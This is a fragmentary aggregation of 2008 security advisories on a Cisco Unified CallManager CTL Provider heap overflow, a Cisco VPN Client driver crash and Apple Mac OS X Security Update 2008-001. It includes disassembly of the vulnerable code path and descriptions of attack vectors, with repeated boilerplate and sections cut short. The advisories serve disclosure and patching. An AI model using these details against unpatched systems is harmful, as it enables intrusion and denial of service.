[ebp-1919Ch] .text:004060AE 191B0 50 push eax ; void * .text:004060AF 191B4 8B+ mov eax, [edi+14h] .text:004060B2 191B4 03+ add eax, [ebp-1Ch] .text:004060B5 191B4 50 push eax ; void * .text:004060B6 191B8 E8+ call memcpy .text:004060B6 191B8 2F+ .text:004060BB 191B8 B8+ mov eax, 16384 .text:004060C0 191B8 83+ add esp, 1Ch .text:004060C3 1919C 39+ cmp [ebp-14h], eax .text:004060C6 1919C 75+ jnz short loc_4060F8 .text:004060C8 1919C 50 push eax ; int .text:004060C9 191A0 68+ push offset str__ErrDExceeds16k ; 'err %d exceeds 16K' .text:004060CE 191A4 8D+ lea eax, [ebp-88h] .text:004060D4 191A4 68+ push 80000h ; int .text:004060D9 191A8 50 push eax ; int .text:004060DA 191AC E8+ call log_message .text:004060DA 191AC B7+ .text:004060DF 191AC 83+ add esp, 10h .text:004060E2 1919C 81+ add dword ptr [ebp-1Ch], 4000h .text:004060E9 1919C 68+ push offset str__MaybeThereIsMoreData__readAgain ; "Maybe there is more data..Read again" .text:004060EE 191A0 68+ push 10000h .text:004060F3 191A4 E9+ jmp loc_405FFF This will continue until heap chunks are overwritten at the users control, which can be exploited to overwrite memory and further lead to arbitrary code execution. -- Vendor Response: http://www.cisco.com/warp/public/707/cisco-sa-20080116-cucmctl.shtml -- Disclosure Timeline: 2007.06.04 - Vulnerability reported to vendor 2008.01.16 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce - TippingPoint DVLabs. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Successful exploitation allows execution of arbitrary code. CUCM 4.0: Update to a fixed version of CUCM 4.1 or later. CUCM 4.1: Update to CUCM 4.1(3)SR5c, CUCM 4.1(3)SR6, or later. http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-41?psrtdcat20e2 CUCM 4.2: Update to CUCM 4.2(3)SR3 or later. http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-42?psrtdcat20e2 CUCM 4.3: Update to CUCM 4.3(1)SR1, CUCM 4.3(1)SR1a, or later. http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-43?psrtdcat20e2 PROVIDED AND/OR DISCOVERED BY: Cody Pierce, TippingPoint DVLabs ORIGINAL ADVISORY: TPTI-08-02: http://dvlabs.tippingpoint.com/advisory/TPTI-08-02 Cisco (100345): http://www.cisco.com/warp/public/707/cisco-sa-20080116-cucmctl.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. There is a workaround for this vulnerability. Cisco has made free software available to address these vulnerabilities for affected customers. Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0027 has been assigned to this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080116-cucmctl.shtml. CUCM Versions 3.3, 4.0, 4.1 and 5.0 retain the Cisco Unified CallManager name. Products Confirmed Not Vulnerable +-------------------------------- CUCM Versions 3.3, 5.0, 5.1, 6.0, 6.1 and Cisco CallManager Express are not affected by this vulnerability. No other Cisco products are currently known to be affected by this vulnerability. Details ======= Cisco Unified Communications Manager (CUCM) is the call processing component of the Cisco IP telephony solution that extends enterprise telephony features and functions to packet telephony network devices, such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications. The CTL contains public keys and other information to allow the Cisco IP Phone devices to establish a trusted relationship with a CUCM server. The CTL is provisioned using the CTL Provider service on a CUCM server and with the CTL Provider client on an administrator workstation. The CTL Provider service needs to be enabled during the initial configuration of a CUCM server /cluster or when changes are required to the CTL. Please consult the Workarounds section of this advisory for information on how to determine if the CTL Provider service is enabled on a CUCM server. The CTL Provider service listens on TCP port 2444 by default, but the port can be modified by the user. This issue is documented in Cisco Bug ID CSCsj22605. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS Version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss CSCsj22605 - CUCM CTL Provider Heap Overflow Vulnerability CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of this vulnerability may result in a DoS condition or the execution of arbitrary code. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Workarounds =========== It is possible to workaround the vulnerability by disabling the CTL Provider service when not in use. Access to the CTL Provider service is required for the initial configuration of the CUCM authentication and encryption features, or during configuration updates. For the CUCM 4.x systems, please consult the following documentation for details on how to disable the CUCM services: http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a008070ec49.html Filtering traffic to the affected CUCM systems on screening devices can be used as a mitigation technique for this vulnerability. To mitigate the CTL Producer service overflow, access to TCP port 2444 should be permitted only between the CUCM servers and administrator workstations running the CTL Provider client. There is currently no supported method to configure filtering directly on a CUCM system. It is possible to change the default ports of the CTL Provider (TCP port 2444) service. If changed, filtering should be based on the port value used. The value of the port can be viewed in CUCM Administration interface by following the System > Service Parameters menu and selecting the CTL Provider service. Filters blocking access to TCP port 2444 should be deployed at the network edge as part of a transit access control list (tACL). Further information about transit access control lists is available in the white paper "Transit Access Control Lists: Filtering at Your Edge," which is available at the following link: http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Additional mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20080116-cucmctl.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Fixed software for CUCM can be obtained here: +-------------------------------------------------+ | CUCM | Fixed | Recommended | Download | | Version | Release | Release | Location | |---------+---------+-------------+---------------| | | | Upgrade to | | | CUCM | | a fixed | | | 4.0 | N/A | Version of | N/A | | | | CUCM 4.1 or | | | | | later | | |---------+---------+-------------+---------------| | | | | http:// | | | CUCM | CUCM 4.1(3) | www.cisco.com | | CUCM | 4.1(3) | SR6 or | /pcgi-bin/ | | 4.1 | SR5c | later | tablebuild.pl | | | | | /callmgr-41? | | | | | psrtdcat20e2 | |---------+---------+-------------+---------------| | | | | http:// | | | CUCM | CUCM 4.2(3) | www.cisco.com | | CUCM | 4.2(3) | SR3 or | /pcgi-bin/ | | 4.2 | SR3 | later | tablebuild.pl | | | | | /callmgr-42? | | | | | psrtdcat20e2 | |---------+---------+-------------+---------------| | | | | http:// | | | CUCM | CUCM 4.3(1) | www.cisco.com | | CUCM | 4.3(1) | SR1a or | /pcgi-bin/ | | 4.3 | SR1 | later | tablebuild.pl | | | | | /callmgr-43? | | | | | psrtdcat20e2 | +-------------------------------------------------+ Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. This vulnerability was reported to Cisco by TippingPoint. Cisco would like to thank TippingPoint for reporting this vulnerability and working with us towards resolution of this problem. Status of This Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20080116-cucmctl.shtml. In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-teams@first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-January-16 | public | | | | release. | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) iEYEARECAAYFAkeOKKYACgkQ86n/Gc8U/uDywwCfVk/A68YckSgZ070lK8aW10By djAAnR/h+tI2S3/7csJyQHrHeZ7Nrhbz =h46X -----END PGP SIGNATURE-----

Cisco Systems VPN Client IPSec Driver (CVPNDRVA.sys) 5.0.02.0090 allows local users to cause a denial of service (crash) by calling the 0x80002038 IOCTL with a small size value, which triggers memory corruption. Successfully exploiting this issue allows local attackers to crash affected computers, denying further service to legitimate users. This issue affects 'cvpndrva.sys' 5.0.02.0090; other versions of the driver may also be affected. Cisco VPN Client is a set of cross-platform VPN client software from Cisco. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. This can be exploited to cause a memory corruption within kernel space by sending specially crafted IOCTLs to the affected driver, resulting in a system crash. The vulnerability is reported in CVPNDRVA.sys version 5.0.02.0090. SOLUTION: Restrict access to trusted users. PROVIDED AND/OR DISCOVERED BY: mu-b, Digit-Labs ORIGINAL ADVISORY: http://milw0rm.com/exploits/4911 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Argument injection vulnerability in Terminal.app in Terminal in Apple Mac OS X 10.4.11 and 10.5 through 10.5.1 allows remote attackers to execute arbitrary code via unspecified URL schemes. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including Launch Services, Mail, NFS, Parental Controls, and Terminal. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers. Apple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. I. Further details are available in the US-CERT Vulnerability Notes Database. These products include Samba and X11. II. Impact The impacts of these vulnerabilities vary. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-043B Feedback VU#774345" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 12, 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR7HyXPRFkHkM87XOAQLgawf/WfBp5mjT+DZriprWRqe1HM4Z9SSe/5Dg jMgSlX1j/YJC7FgZfjJvriQ+yXeOnhwvKggfTbkJWej+0AeRbyIUFWD/ZTh2Qylp /1vBehJW9nhT2yMT65/gT/MnbArN11AILkfSGr4W6xLPMR2zq0HsrP2SxYlAVkSO PPlo0KhWWATcjHjJEacdmry4fR6iv6xA0gFjWN6i18VX5LSMOEyO3LpDt+Rk8fet r7Pwi/QEr/nipEEw8R8Jg9+LT8dqQL1t+yhTa5pV1rceuEb3Cz67paHAqRneldW9 SAl/TPznmYCCMHqyOfHdRBUVvOxI09OPjHYkf7ghv5e06LqbfVMZug== =qwP5 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) An unspecified error exists within Foundation in Safari's handling of URLs. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. 2) A weakness exists due to Launch Services allowing users to start uninstalled applications from a Time Machine Backup. 3) An error in the handling of file:// URLs in Mail can be exploited to execute arbitrary applications without warning when a user is enticed to click on a URL within a message. 4) An unspecified error exists within NFS when handling mbuf chains. This can be exploited to cause a memory corruption and allows a system shutdown and potential execution of arbitrary code. 5) The problem is that Parental Controls contacts www.apple.com when a site is unblocked and allows for detection of computers running Parental Controls. 6) A boundary error in Samba can be exploited by malicious people to compromise a vulnerable system. For more information: SA27760 7) An input validation error exists in Terminal when processing URL schemes. This can be exploited to launch an application with arbitrary command line parameters and may allow execution of arbitrary code when a user visits a specially crafted web page. 8) Multiple vulnerabilities in X11 X Font Server can be exploited by malicious, local users to gain escalated privileges. For more information: SA27040 9) An error exists in X11, which causes certain settings ("Allow connections from network client") not to be applied. Security Update 2008-001 (PPC): http://www.apple.com/support/downloads/securityupdate2008001ppc.html Security Update 2008-001 (Universal): http://www.apple.com/support/downloads/securityupdate2008001universal.html Mac OS X 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosx1052comboupdate.html Mac OS X Server 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosxserver1052comboupdate.html PROVIDED AND/OR DISCOVERED BY: 2) The vendor credits Steven Fisher of Discovery Software Ltd. and Ian Coutier. 4) The vendor credits Oleg Drokin, Sun Microsystems. 5) The vendor credits Jesse Pearson. 6) Alin Rad Pop, Secunia Research. 7) The vendor credits Olli Leppanen of Digital Film Finland, and Brian Mastenbrook. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307430 OTHER REFERENCES: SA27040: http://secunia.com/advisories/27040/ SA27760: http://secunia.com/advisories/27760/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Parental Controls in Apple Mac OS X 10.5 through 10.5.1 contacts www.apple.com "when a website is unblocked," which allows remote attackers to determine when a system is running Parental Controls. A vulnerability in the way Apple Mac OS X handles specially crafted URLs may allow an attacker to execute arbitrary code. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including Launch Services, Mail, NFS, Parental Controls, and Terminal. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers. Apple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. I. Further details are available in the US-CERT Vulnerability Notes Database. These products include Samba and X11. II. Impact The impacts of these vulnerabilities vary. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-043B Feedback VU#774345" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 12, 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR7HyXPRFkHkM87XOAQLgawf/WfBp5mjT+DZriprWRqe1HM4Z9SSe/5Dg jMgSlX1j/YJC7FgZfjJvriQ+yXeOnhwvKggfTbkJWej+0AeRbyIUFWD/ZTh2Qylp /1vBehJW9nhT2yMT65/gT/MnbArN11AILkfSGr4W6xLPMR2zq0HsrP2SxYlAVkSO PPlo0KhWWATcjHjJEacdmry4fR6iv6xA0gFjWN6i18VX5LSMOEyO3LpDt+Rk8fet r7Pwi/QEr/nipEEw8R8Jg9+LT8dqQL1t+yhTa5pV1rceuEb3Cz67paHAqRneldW9 SAl/TPznmYCCMHqyOfHdRBUVvOxI09OPjHYkf7ghv5e06LqbfVMZug== =qwP5 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) An unspecified error exists within Foundation in Safari's handling of URLs. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. 2) A weakness exists due to Launch Services allowing users to start uninstalled applications from a Time Machine Backup. 3) An error in the handling of file:// URLs in Mail can be exploited to execute arbitrary applications without warning when a user is enticed to click on a URL within a message. 4) An unspecified error exists within NFS when handling mbuf chains. This can be exploited to cause a memory corruption and allows a system shutdown and potential execution of arbitrary code. 6) A boundary error in Samba can be exploited by malicious people to compromise a vulnerable system. For more information: SA27760 7) An input validation error exists in Terminal when processing URL schemes. This can be exploited to launch an application with arbitrary command line parameters and may allow execution of arbitrary code when a user visits a specially crafted web page. 8) Multiple vulnerabilities in X11 X Font Server can be exploited by malicious, local users to gain escalated privileges. For more information: SA27040 9) An error exists in X11, which causes certain settings ("Allow connections from network client") not to be applied. Security Update 2008-001 (PPC): http://www.apple.com/support/downloads/securityupdate2008001ppc.html Security Update 2008-001 (Universal): http://www.apple.com/support/downloads/securityupdate2008001universal.html Mac OS X 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosx1052comboupdate.html Mac OS X Server 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosxserver1052comboupdate.html PROVIDED AND/OR DISCOVERED BY: 2) The vendor credits Steven Fisher of Discovery Software Ltd. and Ian Coutier. 4) The vendor credits Oleg Drokin, Sun Microsystems. 5) The vendor credits Jesse Pearson. 6) Alin Rad Pop, Secunia Research. 7) The vendor credits Olli Leppanen of Digital Film Finland, and Brian Mastenbrook. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307430 OTHER REFERENCES: SA27040: http://secunia.com/advisories/27040/ SA27760: http://secunia.com/advisories/27760/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Mail in Apple Mac OS X 10.4.11 allows remote attackers to execute arbitrary commands via a crafted file:// URL. Apple Mac OS X is prone to multiple security vulnerabilities. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers. Apple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. I. Further details are available in the US-CERT Vulnerability Notes Database. These products include Samba and X11. II. Impact The impacts of these vulnerabilities vary. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-043B Feedback VU#774345" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 12, 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR7HyXPRFkHkM87XOAQLgawf/WfBp5mjT+DZriprWRqe1HM4Z9SSe/5Dg jMgSlX1j/YJC7FgZfjJvriQ+yXeOnhwvKggfTbkJWej+0AeRbyIUFWD/ZTh2Qylp /1vBehJW9nhT2yMT65/gT/MnbArN11AILkfSGr4W6xLPMR2zq0HsrP2SxYlAVkSO PPlo0KhWWATcjHjJEacdmry4fR6iv6xA0gFjWN6i18VX5LSMOEyO3LpDt+Rk8fet r7Pwi/QEr/nipEEw8R8Jg9+LT8dqQL1t+yhTa5pV1rceuEb3Cz67paHAqRneldW9 SAl/TPznmYCCMHqyOfHdRBUVvOxI09OPjHYkf7ghv5e06LqbfVMZug== =qwP5 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) An unspecified error exists within Foundation in Safari's handling of URLs. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. 2) A weakness exists due to Launch Services allowing users to start uninstalled applications from a Time Machine Backup. 4) An unspecified error exists within NFS when handling mbuf chains. This can be exploited to cause a memory corruption and allows a system shutdown and potential execution of arbitrary code. 5) The problem is that Parental Controls contacts www.apple.com when a site is unblocked and allows for detection of computers running Parental Controls. 6) A boundary error in Samba can be exploited by malicious people to compromise a vulnerable system. For more information: SA27760 7) An input validation error exists in Terminal when processing URL schemes. This can be exploited to launch an application with arbitrary command line parameters and may allow execution of arbitrary code when a user visits a specially crafted web page. 8) Multiple vulnerabilities in X11 X Font Server can be exploited by malicious, local users to gain escalated privileges. For more information: SA27040 9) An error exists in X11, which causes certain settings ("Allow connections from network client") not to be applied. Security Update 2008-001 (PPC): http://www.apple.com/support/downloads/securityupdate2008001ppc.html Security Update 2008-001 (Universal): http://www.apple.com/support/downloads/securityupdate2008001universal.html Mac OS X 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosx1052comboupdate.html Mac OS X Server 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosxserver1052comboupdate.html PROVIDED AND/OR DISCOVERED BY: 2) The vendor credits Steven Fisher of Discovery Software Ltd. and Ian Coutier. 4) The vendor credits Oleg Drokin, Sun Microsystems. 5) The vendor credits Jesse Pearson. 6) Alin Rad Pop, Secunia Research. 7) The vendor credits Olli Leppanen of Digital Film Finland, and Brian Mastenbrook. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307430 OTHER REFERENCES: SA27040: http://secunia.com/advisories/27040/ SA27760: http://secunia.com/advisories/27760/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in NFS in Apple Mac OS X 10.5 through 10.5.1 allows remote attackers to cause a denial of service (system shutdown) or execute arbitrary code via unknown vectors related to mbuf chains that trigger memory corruption. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including Launch Services, Mail, NFS, Parental Controls, and Terminal. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers. Apple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. If the system is used as an NFS client or server, a malicious NFS server or client can cause the system to shut down unexpectedly or execute arbitrary commands. I. Further details are available in the US-CERT Vulnerability Notes Database. These products include Samba and X11. II. Impact The impacts of these vulnerabilities vary. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-043B Feedback VU#774345" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 12, 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR7HyXPRFkHkM87XOAQLgawf/WfBp5mjT+DZriprWRqe1HM4Z9SSe/5Dg jMgSlX1j/YJC7FgZfjJvriQ+yXeOnhwvKggfTbkJWej+0AeRbyIUFWD/ZTh2Qylp /1vBehJW9nhT2yMT65/gT/MnbArN11AILkfSGr4W6xLPMR2zq0HsrP2SxYlAVkSO PPlo0KhWWATcjHjJEacdmry4fR6iv6xA0gFjWN6i18VX5LSMOEyO3LpDt+Rk8fet r7Pwi/QEr/nipEEw8R8Jg9+LT8dqQL1t+yhTa5pV1rceuEb3Cz67paHAqRneldW9 SAl/TPznmYCCMHqyOfHdRBUVvOxI09OPjHYkf7ghv5e06LqbfVMZug== =qwP5 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) An unspecified error exists within Foundation in Safari's handling of URLs. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. 2) A weakness exists due to Launch Services allowing users to start uninstalled applications from a Time Machine Backup. 3) An error in the handling of file:// URLs in Mail can be exploited to execute arbitrary applications without warning when a user is enticed to click on a URL within a message. 4) An unspecified error exists within NFS when handling mbuf chains. This can be exploited to cause a memory corruption and allows a system shutdown and potential execution of arbitrary code. 5) The problem is that Parental Controls contacts www.apple.com when a site is unblocked and allows for detection of computers running Parental Controls. 6) A boundary error in Samba can be exploited by malicious people to compromise a vulnerable system. For more information: SA27760 7) An input validation error exists in Terminal when processing URL schemes. This can be exploited to launch an application with arbitrary command line parameters and may allow execution of arbitrary code when a user visits a specially crafted web page. 8) Multiple vulnerabilities in X11 X Font Server can be exploited by malicious, local users to gain escalated privileges. For more information: SA27040 9) An error exists in X11, which causes certain settings ("Allow connections from network client") not to be applied. Security Update 2008-001 (PPC): http://www.apple.com/support/downloads/securityupdate2008001ppc.html Security Update 2008-001 (Universal): http://www.apple.com/support/downloads/securityupdate2008001universal.html Mac OS X 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosx1052comboupdate.html Mac OS X Server 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosxserver1052comboupdate.html PROVIDED AND/OR DISCOVERED BY: 2) The vendor credits Steven Fisher of Discovery Software Ltd. and Ian Coutier. 4) The vendor credits Oleg Drokin, Sun Microsystems. 5) The vendor credits Jesse Pearson. 6) Alin Rad Pop, Secunia Research. 7) The vendor credits Olli Leppanen of Digital Film Finland, and Brian 